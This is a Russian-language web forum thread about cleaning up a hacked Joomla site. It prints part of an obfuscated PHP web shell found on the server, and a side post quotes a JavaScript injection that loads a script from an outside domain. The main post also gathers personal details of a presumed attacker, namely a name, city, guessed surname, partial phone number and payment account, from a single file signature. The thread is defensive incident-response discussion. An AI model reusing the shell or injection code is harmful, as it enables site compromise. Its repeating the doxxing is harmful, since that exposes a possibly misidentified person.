@$_SERVER[$i59[39].$i59[81].$i59[81].$i59[96].$i59[73].$i59[39].$i59[45].$i59[38].$i59[81]]); return TRUE;}function ppuqd76($i59, $zcxpv1, $fnxyh15) { if (!isset($zcxpv1) || $zcxpv1 == "") return FALSE; $couuh34 = @$GLOBALS['vkxhv92'][$zcxpv1]; if ($fnxyh15) { $lyvyv48 = $GLOBALS['knpxe74']($couuh34); $couuh34 = ''; for($haxae63 = 0; $haxae63 < $GLOBALS['tscso85']($lyvyv48); $haxae63++) $couuh34.= $GLOBALS['dkzox36']($GLOBALS['nqkyz54']($lyvyv48[$haxae63]) ^ 2); } return $GLOBALS['ywanc2']($GLOBALS['ggbdg61']($couuh34));}?>

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

И так. Проникновение на сервер произошло через Joomla 3.0, уязвимость описана здесь. Для закрытия уязвимости была обновлена Joomla, и куплен/установлен RSFirewall, который нашел остальные шеллы и будет в дальнейшем защищать сайт от XSS и переборов.

 

Ревизор все-таки зашел на подготовленную мною страницу и jsdetector ничего внятного не показал, только что у него установлен плагин для браузера - "Garena Talk Plugin". А значит он у нас играет. В XML файле, модуля "modules/mod_ariim/mod_ariim.xml", который отличается от оригинала, был найден автограф. 

<?xml version="1.0" encoding="utf-8"?><install version="1.5" type="module">
<name>System</name>
<author>Joomla</author>
<creationDate>08 Jan 2010</creationDate>
<copyright>Copyright ©  Profexor Liberty</copyright>
<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>
<authorEmail>profexor@hell.com</authorEmail>
<version>1.0.0</version>
<description>Модуль устранения неисправностей</description>
<files>
<filename module="mod_ariim">mod_ariim.php</filename>
        <filename module="mod_ariim">mod_ariim.xml</filename>
</files>
    <params description="this module has no parameteres" >
    </params>
</install>

 

Как видно его никнейм - profexor, немного погуглив узнаем больше.

 

Старый ник - Dr.profexor. Свою активность в интернет начал в 2009 году, а то и ранее. Имеет большой опыт в таких делах. Сидит на античате (профиль). Из проектов, которые он делал, известен только один 3gp-film.ru. Так же он является его первым юзером и долгое время поддерживал его. Имеется множество упоминаний города - Саратов, и имени - Андрей. Предполагаемая фамилия - Бабенков. Телефон начинается на 7927911****. Возраст 30±5 лет. Так же найден WM аккаунт сего товарища, имеет персональный аттестат. Активность и BL уровень аккаунта говорят о том, что кошелек активно используется.

 

Вот и все, всем спасибо.

P.S. Андрей, тебе огромный привет. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Как видно его никнейм - profexor, немного погуглив узнаем больше.

 

Старый ник - Dr.profexor. Свою активность в интернет начал в 2009 году, а то и ранее. Имеет большой опыт в таких делах. Сидит на античате (профиль). Из проектов, которые он делал, известен только один 3gp-film.ru. Так же он является его первым юзером и долгое время поддерживал его. Имеется множество упоминаний города - Саратов, и имени - Андрей. Предполагаемая фамилия - Бабенков. Телефон начинается на 7927911****. Возраст 30±5 лет. Так же найден WM аккаунт сего товарища, имеет персональный аттестат. Активность и BL уровень аккаунта говорят о том, что кошелек активно используется.

 

Вот и все, всем спасибо.

P.S. Андрей, тебе огромный привет. 

Для ревизора как-то очень неразумно и бестолково оставлять свой автограф, вы не думали, что это для отвода глаз на левого человека?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Похожий контент

    • От ArtemPitov
      498.00 руб
      Скачать/Купить дополнение


      Защита от вирусов и хакеров
      После Нового Года планируется работа над крупным обновлением
       
      Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью!
       

       
      Модуль умеет :
      Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов  Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута)  
      В планах:
      Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа  Добавить возможность задавать ссылку для переадресации   
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.  
      Тип распространения:
      as is (как есть)  
      Установка:
      Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha"  Важно! Если у вас переименованная папка admin модуль не будет работать  
      Добавил ArtemPitov Добавлено 14.01.2018 Категория Модули Системные требования PHP 5.4 и выше Сайт разработчика https://pitov.pro Старая цена 498 Метод активации Без активации Ioncube Loader Нет OpenCart 2.3
      2.2
      2.1
      2.0 ocStore 2.3
      2.2
      2.1 OpenCart.Pro, ocShop Opencart.pro 2.3
      Opencart.pro 2.1
      OcShop 2.0.3.х
      Не проверялось  
    • От ArtemPitov
      После Нового Года планируется работа над крупным обновлением
       
      Модуль позволит обезопасить ваш интернет-магазин на базе OpenCart 2.х от взлома, обеспечит надежную защиту административной части магазина. Даже если вы случайно попались на уловки мошенников или злоумышленник получил данные для входа - не проблема! Модуль обеспечит надежную защиту, просто настройте модуль и можете забыть о проблемах с безопасностью!
       

       
      Модуль умеет :
      Открывать доступ к административной части магазина по секретному ключу. Пример: www.site.com/admin?my_secret_key. Видео: http://take.ms/NgocS Открывать доступ для разрешенных IP адресов  Добавлять капчу reCaptcha от google при авторизации. Капча усложняет процесс перебора паролей (брута)  
      В планах:
      Добавить 2х этапную авторизацию от google. Усложнить процесс создания секретного ключа  Добавить возможность задавать ссылку для переадресации   
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.  
      Тип распространения:
      as is (как есть)  
      Установка:
      Загрузить через стандартный установщик Opencart После установки в настройках магазина появится пункт "Защита админ панели" Важно! Чтобы работала reCaptcha нужно настроить модуль "Дополнения → Captcha → reCaptcha"  Важно! Если у вас переименованная папка admin модуль не будет работать  
    • От IIIBarsik
      Старый сайт:
      OcStore 1.5 
      Тема стандартная (defaut) 
       
      Сегодня зашел на него, а он грузится почти минуту. Полез смотреть в начале через chrome, что увидел: 
      что то такое (картинка из инета)

      В хидере под тегом <head> был скрипт с ссылкой на на данный ресурс. 
      Побежал в header.tpl (catalog\view\theme\default\template\common) увидел там такую вещь: 
      <?php foreach ($scripts as $script) { ?> <script type="text/javascript" src="<?php echo $script; ?>"></script> <?php } ?> Понимаю, что данная херота может инклудится вот сюда из любого файла
      Нашел ее довольно быстро, а именно в catalog\view\javascript\common.js
      В конце файла была приписка:
      document.write('<script src="https://afrodizinlife.gq"><\x2fscript>'); Собственно вопрос:
      Как такие вещи вообще происходят на opencart?
      P.S. По поводу паролей можно не писать: 
      1. 10 значные с спецсимволами + регистры
      2. В браузере не храню
      3. В FileZilla тоже не храню
      Я, конечно, понимаю, что все зависит от определенной сборки, шаблона и установленного на сайт, но есть ли основные дыры, которые необходимо латать? 
      Или какие то минимумы, что необходимо сделать всем и вся? 
    • От Kompanetsr
      Добрый день!
       
      Ребят, кто понимает, в чем может быть проблема?
      Вы не могли бы взглянуть на сайт, либо взлом, либо проблема с шаблоном... Перед этим всем в карточках товара вылазила ошибка 500
      Пробовали делать Бэк-ап, но на следующий день снова имеем то, что имеем (кривую главную страницу и всё)
      mnogo-mozaiki.ru
       
      Для удобства и быстроты связи можете писать в вотсап 89150803060 Роман
    • От mirek
      498.00 руб
      Скачать/Купить дополнение


      Двух факторная Google авторизация для админ панели
      Модуль позволяет обезопасить ваш интернет-магазин на базе OpenCart 2.х от не санкционированного доступа Обеспечивает надежную защиту административной части магазина. Даже в том случае если злоумышленник получил логин и пароль от админ панели Вашего магазина  - он не сможет войти! Модуль активирует вход в админ панель магазина используя двух факторную Google авторизацию!

       
      Коды доступа меняются с интервалом в 30 секунд!
       
      Для использования двух факторной Google авторизации Вам необходимо также скачать и установить на свое мобильное устройство
      приложение Google Authenticator!  Коды доступа генерируются в приложении Google Authenticator Их необходимо вводить в форму авторизации
      на Вашем сайте

      Приложение Google Authenticator Вы можете найти и скачать в Play Market на своем мобильном устройстве!

      Внимание! При использовании двух факторной Google авторизации имейте ввиду возможную рассинхронизацию времени 
      между времененм на хостинге на котором работает Ваш сайт и временем на мобильном устройстве которое Вы используете
      для получения кодов для прохождения двух факторной Google авторизации

      Код полученный на Вашем устройстве подходит только в то время которое показывает Ваше мобильное устройство! 
       
      Лицензия:
      Модуль продается с лицензией на один сайт, одна покупка = один домен Покупая копию модуля вы получаете право только на использование. Распространяя модуль платно или бесплатно вы нарушает лицензию - это грозит обнулением покупки, а так же уголовной ответственность предусмотренной статей 146 УК РФ (Нарушение авторских и смежных прав)  Автор оставляет за собой право изменят условия предоставления лицензии, цену и строк продления дополнения. Все доработки и изменения функционала не входят в стоимость и оплачиваются отдельно. Модуль официально продается только через площадку opencartforum, другое получения дополнения считается не легальным.
       Тип распространения:
      as is (как есть)  
      Установка:
      Для установки модуля users2fa Вам необходимо в административной панели Вашего сайта в Разделе Дополнения -> Установка дополнений
      загрузить zip архив с модулем После того как модуль установится можно перейти в подраздел Дополнения -> Менеджер дополнений и обновить кеш (иконка в правом верхнем углу) После установки в настройках пользователей админ панели появится пункт "Использовать 2fa google авторизацию" Добавил mirek Добавлено 02.04.2018 Категория Модули Системные требования Сайт разработчика http://hgroup.pp.ua Старая цена Метод активации Без активации Ioncube Loader Нет OpenCart 2.3
      2.2
      2.1
      2.0 ocStore 2.3
      2.2
      2.1 OpenCart.Pro, ocShop Не проверялось  
  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.